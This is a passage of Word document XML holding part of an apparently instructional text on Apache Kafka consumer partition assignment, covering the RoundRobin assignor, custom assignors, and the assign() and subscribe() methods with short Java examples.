          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Consumer 1: Partitions 0-2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6441F0D3" w14:textId="77777777" w:rsidR="004B35F9" w:rsidRPr="00CE4B95" w:rsidRDefault="004B35F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="246"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Consumer 2: Partitions 3-4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C0B740" w14:textId="77777777" w:rsidR="004B35F9" w:rsidRPr="00CE4B95" w:rsidRDefault="004B35F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="246"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Consumer 3: Partitions 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4301F9" w14:textId="77777777" w:rsidR="004B35F9" w:rsidRPr="00CE4B95" w:rsidRDefault="004B35F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="246"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>RoundRobin Assignor</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01AF5A45" w14:textId="77777777" w:rsidR="004B35F9" w:rsidRPr="00CE4B95" w:rsidRDefault="004B35F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="246"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>RoundRobin Assignor</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> distributes partitions to consumers in a round-robin fashion. This ensures that partitions are distributed more evenly, regardless of how many partitions there are.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F26AE02" w14:textId="77777777" w:rsidR="004B35F9" w:rsidRPr="00CE4B95" w:rsidRDefault="004B35F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="246"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49EE4B42" w14:textId="77777777" w:rsidR="004B35F9" w:rsidRPr="00CE4B95" w:rsidRDefault="004B35F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="246"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Consumer 1: Partition 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55CA0D39" w14:textId="77777777" w:rsidR="004B35F9" w:rsidRPr="00CE4B95" w:rsidRDefault="004B35F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="246"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Consumer 2: Partition 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436A3346" w14:textId="77777777" w:rsidR="004B35F9" w:rsidRPr="00CE4B95" w:rsidRDefault="004B35F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="246"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Consumer 3: Partition 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C3DF006" w14:textId="77777777" w:rsidR="004B35F9" w:rsidRPr="00CE4B95" w:rsidRDefault="004B35F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="246"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Consumer 1: Partition 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2E1016" w14:textId="77777777" w:rsidR="004B35F9" w:rsidRPr="00CE4B95" w:rsidRDefault="004B35F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="246"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Consumer 2: Partition 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352C0A23" w14:textId="77777777" w:rsidR="004B35F9" w:rsidRPr="00CE4B95" w:rsidRDefault="004B35F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="246"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Consumer 3: Partition 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758DBB00" w14:textId="77777777" w:rsidR="004B35F9" w:rsidRPr="00CE4B95" w:rsidRDefault="004B35F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="246"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Custom Partition Assignment</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594BEA7B" w14:textId="77777777" w:rsidR="004B35F9" w:rsidRPr="00CE4B95" w:rsidRDefault="004B35F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="246"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kafka allows you to implement custom partition assignment strategies if the default strategies do not meet your needs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506F57B6" w14:textId="77777777" w:rsidR="004B35F9" w:rsidRPr="00CE4B95" w:rsidRDefault="004B35F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="246"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>You can implement your own PartitionAssignor interface, which provides methods to control how partitions are assigned to consumers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A84B197" w14:textId="77777777" w:rsidR="004B35F9" w:rsidRPr="00CE4B95" w:rsidRDefault="004B35F9" w:rsidP="004B35F9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Methods Used for Partition Assignment:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9DCAD8" w14:textId="77777777" w:rsidR="004B35F9" w:rsidRPr="00CE4B95" w:rsidRDefault="004B35F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="247"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>assign() Method</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (for manual assignment):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537B83E7" w14:textId="77777777" w:rsidR="004B35F9" w:rsidRPr="00CE4B95" w:rsidRDefault="004B35F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="247"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">You can manually assign partitions to consumers using the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>assign()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> method. This method is useful when you want explicit control over which partitions each consumer consumes from.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4480210A" w14:textId="77777777" w:rsidR="004B35F9" w:rsidRPr="00CE4B95" w:rsidRDefault="004B35F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="247"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Example (manual assignment):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA67634" w14:textId="77777777" w:rsidR="007149D8" w:rsidRPr="00CE4B95" w:rsidRDefault="007149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7344384"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>KafkaConsumer</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consum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KafkaConsumer</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;&gt;(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>props</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A415812" w14:textId="010A4033" w:rsidR="007149D8" w:rsidRPr="00CE4B95" w:rsidRDefault="007149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7344384"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>consum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sign</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opicPartitio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my-topi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0</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TopicPartition</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my-topic"</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6666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21865414" w14:textId="77777777" w:rsidR="004B35F9" w:rsidRPr="00CE4B95" w:rsidRDefault="004B35F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="247"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>In this case, partitions 0 and 1 of the topic my-topic are explicitly assigned to the consumer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39543B50" w14:textId="77777777" w:rsidR="004B35F9" w:rsidRPr="00CE4B95" w:rsidRDefault="004B35F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="247"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>subscribe() Method</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (for automatic assignment):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7440CE" w14:textId="77777777" w:rsidR="004B35F9" w:rsidRPr="00CE4B95" w:rsidRDefault="004B35F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="247"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">When using the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>subscribe()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> method, Kafka will automatically assign partitions to consumers in the group based on the partition assignment strategy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E70962" w14:textId="77777777" w:rsidR="004B35F9" w:rsidRPr="00CE4B95" w:rsidRDefault="004B35F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="247"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Example (automatic assignment):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C0F55D" w14:textId="77777777" w:rsidR="007149D8" w:rsidRPr="00CE4B95" w:rsidRDefault="007149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830343"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>KafkaConsumer</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;</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String</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> consumer </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000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>KafkaConsumer</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;&gt;(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>props</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
